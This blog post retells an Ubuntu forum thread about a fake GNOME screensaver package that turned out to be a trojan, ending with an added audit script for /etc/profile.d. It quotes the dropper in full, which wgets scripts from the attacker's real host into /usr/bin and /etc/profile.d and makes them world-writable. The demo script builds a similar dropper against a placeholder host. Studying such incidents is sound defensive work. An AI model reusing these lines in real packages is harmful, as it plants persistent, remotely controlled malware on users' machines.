Twenty-four hours ago an Ubuntu user downloaded a screen saver from an UNTRUSTED site.
It was a Trojan.
The lesson is clear. If you are a newbie, DO NOT install files or packages from untrusted sites.
The sequence of events which followed is documented in this Ubuntu forum thread.
Here was his cry for help:
Hello guys, I'm going to make this brief.
I have installed a deb from a site claiming to be a screensaver; it looked dodgy, however I proceeded.
After I looked into the source I found MYSTERIOUS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
I'm no expert but this looks just wrong!!
I have removed the package, however I doubt this has done much good...
Please help; comments exist from other users who have downloaded this file, not understanding why their screensaver did not show up, and who probably left the file installed.
This all just literally happened in the last few minutes and I'm afraid to reboot my computer.. should I reinstall my gnome packages?
Or was I just being paranoid? I'm thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...
Sorry for sounding strange, just trying to fix this A.S.A.P.
Thank you for any suggestions.
In 19 hours the Trojan was analyzed and traced back to the bad guy's site, which was shut down. During that analysis, bash commands to eliminate the files were worked out in the thread. When the discussion started wandering, the thread was closed.
The OP was lucky. One command in the script apparently tried to run "rm -f /*.*", in an attempt to delete the contents of the hard drive, but the bad guy's syntax was defective. The bulk of the Trojan replaces a couple of GNOME files and puts a script into /etc/profile.d, which gets run every time the user logs in. That script does a wget on the hacker's site to download any upgrades to the Trojan's payload.
Then, they discovered him:
http://www.mmowned.com/forums/wow-sc...hing-pack.html
Look here guys.
Turns out it is a WoW fanboy... the most important thing is to get the identity of this person and pull down the file.
He refers to the link in here.. of the http://05748.t35.com/ script thing.
Here's his confession:
The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.
Within a few hours, by msg #29, the malware had been removed from Gnome-look.org.
To check their machines after the malware was cleaned off, it was recommended that they run
ps -C wget
every few hours for a couple of days, to see if a wget process is running that they didn't start.
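The persistence trick described above (a world-writable script dropped into /etc/profile.d that wgets its payload at every login) and the thread's ps -C wget check, turned into one small audit function. This is an added example, not code from the thread; the directory it inspects and the two files in it are constructed here, and the URL is a placeholder.

```shell
#!/bin/sh
# Audit a profile.d-style directory for the two traits the trojan's dropper showed:
# a login script that is world-writable (chmod 777) and one that fetches code with
# wget/curl. Prints one finding per line; returns 0 when clean, 1 when anything was found.
# (On a real system one would also cross-check each file with 'dpkg -S'; not done here.)
audit_profile_d() {
    dir="$1"
    found=0
    for f in "$dir"/*.sh; do
        [ -f "$f" ] || continue
        # world-writable: any local user could edit what every login shell sources
        if [ -n "$(find "$f" -perm -o+w -print)" ]; then
            echo "WRITABLE  $f ($(ls -ld "$f" | cut -c1-10))"
            found=1
        fi
        # a login script has no business downloading anything at all
        hit="$(grep -En '(^|[^A-Za-z_])(wget|curl)[[:space:]]' "$f" | head -n 1)"
        if [ -n "$hit" ]; then
            echo "DOWNLOADS $f (line $hit)"
            found=1
        fi
    done
    return $found
}

# The thread's "ps -C wget" check with owner and start time, so a stray download can be
# told apart from one the user started. Returns 0 and prints nothing when none is running.
check_wget_processes() {
    out="$(ps -C wget -o pid=,user=,lstart=,args= 2>/dev/null)"
    [ -z "$out" ] && return 0
    echo "$out"
    return 1
}

# --- constructed demo directory; these are NOT real system files ---
demo="$(mktemp -d)"
printf '#!/bin/sh\nexport EDITOR=vim\n' > "$demo/editor.sh"
chmod 644 "$demo/editor.sh"
# mimic the dropper: mode 777 and a wget from an attacker host (placeholder URL)
printf '#!/bin/sh\ncd /etc/profile.d/\nwget http://ATTACKER-HOST.invalid/Bots/gnome.sh\n' > "$demo/gnome.sh"
chmod 777 "$demo/gnome.sh"

if audit_profile_d "$demo"; then
    echo "profile.d looks clean"
else
    echo "suspicious login scripts found; review them before the next login"
fi
check_wget_processes || echo "unexpected wget process(es) listed above"
rm -rf "$demo"
```

Run against the real directory with `audit_profile_d /etc/profile.d`, and put `check_wget_processes` in a cron job to get the thread's recurring check without typing it by hand.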
Then, the following message was found on the bad guy's web site:
If you're reading this coming from that ubuntu forums place, well done, you saw right through my "Screensaver" cough cough wink wink. I can tell you this. Basically after getting some scripts to run upon start up, it then sets to work downloading another file. This can be changed on my server so in essence I could do whatever I like on your computer, but I only really want to perform a DOS (denial of service) attack. For no reason I'm attacking mmowned.com, just using it as a test. Hats off!
Within a few hours, by msg #95, both the screen saver and the bad guy's website had been taken down!
I can't let this go without mentioning that if you had been running Windows you would still be waiting for "Tuesday Update", IF Microsoft let you know about the exploit at all.